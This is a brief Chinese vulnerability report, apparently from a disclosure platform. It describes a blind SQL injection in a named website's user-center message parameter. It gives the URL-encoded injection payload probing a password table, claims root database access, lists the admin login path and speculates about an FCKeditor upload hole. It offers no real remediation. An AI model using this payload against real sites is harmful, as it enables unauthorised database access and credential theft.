注射点:
?act=usercenter.messageinfo&messageid={id}%20and%20exists%28select%20password%20from%20system_user%29%23
可以查询mysql.user ,www.xuhantao.com,涛涛电脑知识网,应该是root权限
盲注点。
后台:
?act=login
还存在fckeditor,估计也存在上传漏洞。
具体看下图
修复方案:应该懂得!